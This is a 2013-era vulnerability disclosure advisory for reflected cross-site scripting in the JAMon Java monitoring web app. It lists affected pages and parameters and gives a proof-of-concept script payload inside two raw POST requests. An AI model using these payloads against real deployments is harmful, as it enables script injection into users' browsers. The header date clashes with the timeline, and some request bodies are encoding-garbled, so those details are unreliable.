###################################################
Title: Multiple Reflected XSS vulnerabilities in JAMon
Date published: 2013-01-23
Date of last update: 2013-01-23
Vendors contacted: JAMon v 2.7
Discovered by: Christian Catalano
Severity: Low
CVE reference: CVE-2013-6235
CVSS v2 Base Score: 4.3
CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Component/s: JAMon v 2.7
Class: Input Manipulation
The Java Application Monitor (JAMon) is a free, simple, high performance, thread safe, Java API that allows developers to easily monitor production applications.
http://jamonapi.sourceforge.net
Multiple Non-Persistent Cross-Site Scripting vulnerabilities have been identified in the JAMon web application.
JAMon contains a flaw that allows multiple reflected cross-site scripting (XSS) attacks.
This flaw exists because certain pages do not validate input before returning it to users.
±-----------------------------±------------------+
|-Vulnerable module(s)--------and----parameter(s)–|
±-----------------------------±------------------+
|mondetail.jsp --------------------ArraySQL--------|
|mondetail.jsp --------------------listenertype----|
|mondetail.jsp --------------------currentlistener-|
|jamonadmin.jsp -------------------ArraySQL--------|
|sql.jsp---------------------------ArraySQL--------|
|exceptions.jsp--------------------ArraySQL--------|
±-----------------------------±------------------+
05.01) Malicious Request ("ArraySQL" parameter):
The vulnerability is located in the ' Filter (optional) ' input field upon submission to the pages
http://localhost/jamon/mondetail.jsp
http://localhost/jamon/ jamonadmin.jsp
http://localhost/jamon/ sql.jsp
http://localhost/jamon/ exceptions.jsp
The application does not validate the 'ArraySQL' parameter upon submission to the *.jsp scripts.
The attacker can inject the malicious javascript code:
1–>1<ScRiPt >alert('XSS')</ScRiPt><!–
in the ' Filter (optional) ' input field and click on GO! button.
05.02) Malicious Request ("listenertype " parameter)
POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
listenertype=1–>1<ScRiPt>alert('XSS')</ScRiPt><!–¤tlistener=JAMonBufferListener&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21
05.03) Malicious Request ("currentlistener " parameter)
POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
listenertype=value¤tlistener=1–>1<ScRiPt>alert('XSS')</ScRiPt><!–&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21
This may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.
This vulnerability was tested against: JAMon v2.7
Older versions are probably affected too, but they were not checked.
Currently, there are no known upgrades or patches to correct this vulnerability.
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
October 18th, 2013: Vulnerability identification
October 22th, 2013: Vendor notification [JAMon]
December 10th, 2013: Vulnerability confirmation [JAMonI]
January 23th, 2014: Vulnerability disclosure
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###################################################